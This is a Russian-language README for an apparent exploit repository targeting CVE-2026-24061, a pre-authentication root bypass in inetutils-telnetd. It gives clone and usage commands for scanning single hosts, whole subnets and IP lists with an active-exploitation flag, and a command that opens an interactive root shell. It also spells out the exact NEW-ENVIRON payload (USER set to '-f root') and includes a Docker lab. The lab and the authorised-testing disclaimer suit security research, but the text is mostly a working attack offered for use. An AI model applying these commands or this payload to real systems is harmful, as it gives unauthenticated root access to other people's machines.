
Сканер и интерактивный эксплойт для CVE-2026-24061 в inetutils-telnetd, обеспечивающий доступ root до аутентификации через специально сформированную NEW-ENVIRON-переговоры. Включает многопоточное сканирование и Docker-лабораторию.
👨💻 Автор: Furkan KAYAPINAR (@FurkanKAYAPINAR)
Этот репозиторий содержит сканер уязвимостей и интерактивный эксплойт для CVE-2026-24061. Эта уязвимость затрагивает inetutils-telnetd (и потенциально другие реализации Telnet) из-за некорректной обработки опции Telnet NEW-ENVIRON, что позволяет удалённый доступ без предварительной аутентификации с использованием полезной нагрузки -f root.
--exploit для проверки RCE.inetutils-telnetd для безопасного тестирования.Убедитесь, что у вас установлен Python 3.x.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Использование
Сканирование целей на наличие уязвимости NEW-ENVIRON.
# Сканирование одной цели
python3 scanner.py -t 192.168.1.100 -p 1903
# Сканирование подсети
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Сканирование списка IP-адресов и попытка активной эксплуатации (проверка RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
Получение интерактивного доступа к root-оболочке.
python3 exploit.py -t 127.0.0.1 -p 1903
Разверните локальную уязвимую среду для тестирования:
cd lab
docker-compose up -d --build
Сервис будет прослушивать порт 1903.Уязвимость срабатывает на этапе согласования Telnet. Отвечая на запрос сервера DO NEW-ENVIRON специально сформированным пакетом суб-согласования IS VAR "USER" VALUE "-f root", серверный процесс telnetd обманывается и передаёт флаг -f root процессу login, обходя аутентификацию.
[!WARNING]
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.